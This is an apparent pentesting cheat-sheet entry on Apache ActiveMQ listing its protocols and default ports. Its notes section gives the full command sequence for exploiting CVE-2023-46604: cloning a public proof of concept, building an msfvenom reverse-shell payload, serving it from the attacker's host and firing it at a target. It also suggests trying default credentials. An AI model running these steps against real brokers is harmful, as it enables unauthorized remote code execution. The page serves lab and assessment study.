Apache ActiveMQ
Apache ActiveMQ is an open source message broker written in Java. It support multiple protocols such as JMS, MQTT, STOMP, AMQP.
- Classic (2.2k β) / Artemis (0.9k β)
- Artemis Documentation
- ActiveMQ Artemis is the next gen version
It's commonly used when we need to connect applications that are using different protocols.
Common ports π
- 1883 (TCP, MQTT)
- 5671 (TCP, SSL/TLS AMQP)
- 5672 (TCP, AMQP)
- 8161 (TCP, Admin Web)
- 8883 (TCP, SSL/TLS MQTT)
- 61613 (TCP, STOMP)
- 61614 (TCP, SSL/TLS STOMP)
- 61616 (TCP, ActiveMQ OpenWire transport)
ActiveMQ Pentester Notes β οΈ
- CVE-2023-46604: vulnerability in ActiveMQ OpenWire Transport leading to remote code execution
$ git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ.git cve-2023-46604
$ cd cve-2023-46604
$ sed -i 's/0.0.0.0/x.y.z.t/g' poc-linux.xml
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 RHOSTS=broker.htb -f elf -o test.elf
$ go build
$ python -m http.server 8001 # in another terminal
$ ./ActiveMQ-RCE -i <target_ip> -u http://<your_IP>:8001/poc-linux.xml
- Test default credentials (
admin:admin
,user:user
)